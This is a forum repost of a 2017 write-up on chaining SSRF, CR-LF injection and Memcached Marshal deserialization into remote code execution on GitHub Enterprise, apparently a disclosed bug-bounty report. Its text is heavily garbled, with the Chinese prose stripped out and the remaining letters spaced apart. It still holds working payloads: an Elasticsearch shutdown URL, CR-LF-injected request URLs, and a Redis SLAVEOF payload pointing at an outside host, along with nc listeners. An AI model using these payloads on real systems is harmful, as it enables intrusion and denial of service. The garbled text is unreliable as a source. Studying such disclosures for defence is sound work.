搜索

[11633] 2017-08-06_挖洞经验看我如何综合利用4个漏洞实现GitHubEnterprise远程代码执行

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2017-08-06_挖洞经验看我如何综合利用4个漏洞实现GitHubEnterprise远程代码执行   |   4 G i t H u b   E n t e r p r i s e   c l o u d s   F r e e B u f   2 0 1 7 - 0 8 - 0 6 4 G i t H u b E n t e r p r i s e R C E R C E S S R F R C E G i t H u b 3 $ 1 2 5 0 0 B l a c k H a t P P T S S R F A   N e w   E r a   o f S S R F   -   E x p l o i t i n g   U R L   P a r s e r   i n   T r e n d i n g   P r o g r a m m i n g   L a n g u a g e s < > G i t H u b   E n t e r p r i s e R C E G i t H u b   E n t e r p r i s e   S Q L R u b y G i t H u b S Q L G i t H u b   E n t e r p r i s e T h e   r o a d   t o   y o u r   c o d e b a s e   i s   p a v e d   w i t h   f o r g e d   a s s e r t i o n s   b y   i l e k t r o j o h n G i t H u b   E n t e r p r i s e   R e m o t e   C o d e   E x e c u t i o n   b y   i b l u e 1   -   S S R F G i t H u b   E n t e r p r i s e W e b H o o k G I T H T T P U R L h t t p s : / / / / / s e t t i n g s / h o o k s / n e w G i t H u b   E n t e r p r i s e H T T P P a y l o a d
P a y l o a d   U R L : h t t p : / / o r a n g e . t w / f o o . p h p C a l l b a c k   R e q u e s t G i t H u b   E n t e r p r i s e 使 R u b y   G e m f a r a d a y G e m f a r a d a y - r e s t r i c t - i p - a d d r e s s e s G e m R F C   3 9 8 6 I P R a r e   I P   A d d r e s s   F o r m a t s L i n u x 0 l o c a l h o s t P o C h t t p : / / 0 / O K S S R F S S R F P O S T H T T P H T T P S 3 0 2 f a r a d a y C R - L F P O S T H T T P P a t h S S R F D o S G i t H u b   E n t e r p r i s e 9 2 0 0 E l a s t i c S e a r c h 使 E l a s t i c S e a r c h P O S T R E S T - f u l   A P I D o S P o C h t t p : / / 0 : 9 2 0 0 / _ s h u t d o w n / 2   -   G r a p h i t e S S R F 1 S S R F H T T P C C + + G o P y t h o n R u b y 8 0 0 0 G r a p h i t e P y t h o n G r a p h i t e S S R F w e b a p p s / g r a p h i t e / c o m p o s e r / v i e w s . p y P O S T   / f o o . p h p   H T T P / 1 . 1 H o s t :   o r a n g e . t w A c c e p t :   * / * U s e r - A g e n t :   G i t H u b - H o o k s h o t / 5 4 6 5 1 a c X - G i t H u b - E v e n t :   p i n g X - G i t H u b - D e l i v e r y :   f 4 c 4 1 9 8 0 - e 1 7 e - 1 1 e 6 - 8 a 1 0 - c 8 1 5 8 6 3 1 7 2 8 f c o n t e n t - t y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d C o n t e n t - L e n g t h :   8 9 7 2 p a y l o a d = . . .
G r a p h i t e u r l 1 S S R F 2 S S R F S S R F S S R F P a y l o a d S S R F O K P O S T S S R F G E T S S R F ! 3   -   P y t h o n C R - L F G r a p h i t e G r a p h i t e 使 P y t h o n h t t p l i b . H T T P C o n n e c t i o n h t t p l i b . H T T P C o n n e c t i o n C R - L F H T T P P a y l o a d C R - L F P o C S S R F R e d i s 使 P a y l o a d R e d i s S L A V E O F B l i n d - S S R F S S H M y S Q L S S L P y t h o n 2 2 S S R F 使 P a y l o a d 0 x 0 0 0 x 8 F 便 H T T P L i n u x   G l i b c S S L   S N I C V E - 2 0 1 6 - d e f   s e n d _ e m a i l ( r e q u e s t ) :         t r y :                 r e c i p i e n t s   =   r e q u e s t . G E T [ ' t o ' ] . s p l i t ( ' , ' )                 u r l   =   r e q u e s t . G E T [ ' u r l ' ]                 p r o t o ,   s e r v e r ,   p a t h ,   q u e r y ,   f r a g   =   u r l s p l i t ( u r l )                 i f   q u e r y :   p a t h   + =   ' ? '   +   q u e r y                 c o n n   =   H T T P C o n n e c t i o n ( s e r v e r )                 c o n n . r e q u e s t ( ' G E T ' , p a t h )                 r e s p   =   c o n n . g e t r e s p o n s e ( )                 . . . h t t p : / / 0 : 8 0 0 0 / c o m p o s e r / s e n d _ e m a i l ? t o = o r a n g e @ n o g g & u r l = h t t p : / / o r a n g e . t w : 1 2 3 4 5 / f o o $   n c   - v v l p   1 2 3 4 5 . . . G E T   / f o o   H T T P / 1 . 1 H o s t :   o r a n g e . t w : 1 2 3 4 5 A c c e p t - E n c o d i n g :   i d e n t i t y h t t p : / / 0 : 8 0 0 0 / c o m p o s e r / s e n d _ e m a i l ? t o = o r a n g e @ n o g g & u r l = h t t p : / / 1 2 7 . 0 . 0 . 1 : 1 2 3 4 5 / % 0 D % 0 A i _ a m _ p a y l o a d % 0 D % 0 A F o o : $   n c   - v v l p   1 2 3 4 5 . . . G E T   / i _ a m _ p a y l o a d F o o :   H T T P / 1 . 1 H o s t :   1 2 7 . 0 . 0 . 1 : 1 2 3 4 5 A c c e p t - E n c o d i n g :   i d e n t i t y h t t p : / / 0 : 8 0 0 0 / c o m p o s e r / s e n d _ e m a i l ? t o = o r a n g e @ n o g g & u r l = h t t p : / / 1 2 7 . 0 . 0 . 1 : 6 3 7 9 / % 0 A S L A V E O F % 2 0 o r a n g e . t w % 2 0 6 3 7 9 % 0 A
5 6 9 9 P y t h o n B l a c k H a t P P T 4   -   R e d i s M e m c a c h e d G i t H u b M e m c a c h e d R u b y G i t H u b E n t e r p r i s e 使 R u b y   G e m M e m c a c h e d M a r s h a l M a r s h a l 使 S S R F R u b y M e m c a c h e d G i t H u b R u b y   G e m   m e m c a c h e d G i t H u b   E n t e r p r i s e   R a i l s M a r s h a l 1 S S R F W e b H o o k 2 S S R F G r a p h i t e 1 2 S S R F S S R F S S R F C R - L F M e m c a c h e d M a r s h a l M a r s h a l P o C
h t t p : / / v . y o u k u . c o m / v _ s h o w / i d _ X M j k z N z M 3 N j A 1 N g = = . h t m l E x p l o i t G i t H u b G e m f a r a d a y - r e s t r i c t - i p - a d d r e s s e s
D j a n g o 访 h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 0 0 / r e n d e r / i p t a b l e s U s e r - A g e n t :   G i t H u b - H o o k s h o t 访 2 0 1 7 0 1 2 3 2 3 : 2 2         H a c k e r O n e G i t H u b 2 0 1 7 0 1 2 3 2 3 : 3 7         G i t H u b 2 0 1 7 0 1 2 4 0 4 : 4 3         G i t H u b 2 0 1 7 0 1 3 1 1 4 : 0 1         G i t H u b   E n t e r p r i s e   2 . 8 . 7 2 0 1 7 0 2 0 1 0 1 : 0 2         G i t H u b 2 0 1 7 0 2 0 1 0 1 : 0 2         G i t H u b $ 7 5 0 0 2 0 1 7 0 3 1 5 0 2 : 3 8         G i t H u b $ 5 0 0 0 * o r a n g e . t w f r e e b u f c l o u d s F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理